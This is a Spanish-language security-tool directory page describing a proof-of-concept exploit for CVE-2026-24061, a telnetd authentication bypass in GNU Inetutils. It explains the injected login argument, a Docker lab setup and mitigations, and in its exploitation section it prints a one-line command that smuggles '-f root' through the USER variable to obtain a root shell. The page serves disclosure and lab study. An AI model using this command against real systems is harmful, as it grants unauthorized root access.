Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061 — Exploit de prueba de concepto para la omisión de autenticación de telnetd de GNU Inetutils (CVE-2026-24061) con configuración de laboratorio Docker y PoC en Go. Explota la opción NEW-ENVIRON para obtener un shell root. | Kitploit
Herramientas/GitHubGitHub/chocapikk/cve-2026-24061
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubchocapikk/cve-2026-24061

CVE-2026-24061

Exploit de prueba de concepto para la omisión de autenticación de telnetd de GNU Inetutils (CVE-2026-24061) con configuración de laboratorio Docker y PoC en Go. Explota la opción NEW-ENVIRON para obtener un shell root.

Ver Repositorio
123hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24061

GNU Inetutils telnetd Remote Authentication Bypass

¿En serio, telnet en 2026? Vamos, amigos, ya es hora de pasar página. SSH existe desde 1995. 🤦

Descripción

Una vulnerabilidad crítica de omisión de autenticación en GNU Inetutils telnetd que afecta a las versiones 1.9.3 hasta 2.7.

La vulnerabilidad explota la opción telnet NEW-ENVIRON para inyectar argumentos maliciosos en login(1). Al establecer USER=-f root mediante el protocolo telnet, un atacante puede omitir la autenticación y obtener una shell de root sin credenciales.

Versiones Afectadas

  • GNU Inetutils 1.9.3 - 2.7

Detalles Técnicos

El protocolo telnet soporta la opción NEW-ENVIRON (RFC 1572) que permite al cliente enviar variables de entorno al servidor. El daemon telnetd pasa la variable USER a login(1) como argumento.

Al enviar USER=-f root, el valor se interpreta como:

  • Bandera -f: Omitir autenticación (host de confianza)
  • root: Usuario objetivo

Esto hace que se ejecute login -f root, otorgando acceso root inmediato.

El PoC detecta la explotación exitosa comprobando IAC WILL ECHO (0xff 0xfb 0x01), la señal de protocolo que el servidor envía cuando se concede acceso a la shell.

Configuración del Laboratorio

root@kitploit:~
# Build and run the vulnerable telnetd container
docker compose up --build -d

# Test the exploit
go run poc.go 127.0.0.1 2323

Explotación

root@kitploit:~
# Using the Go PoC (with interactive shell)
go run poc.go <target> <port>

# Simple PoC using standard telnet client
env USER='-f root' telnet -a <target> <port>

Mitigación

  • Deja de usar telnet en 2026, en serio 🙏
  • Usa SSH en su lugar (ya lleva 31 años, ni siquiera había nacido en el 95 jaja)
  • Actualiza a una versión parcheada de GNU Inetutils
  • Restringe el acceso telnet mediante reglas de firewall

Archivos

  • poc.go - Exploit en Go con shell interactiva
  • Dockerfile - Contenedor telnetd vulnerable
  • docker-compose.yml - Orquestación del laboratorio

Referencias

  • Aviso: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

Créditos

  • LeakIX Research Team
Descargar herramienta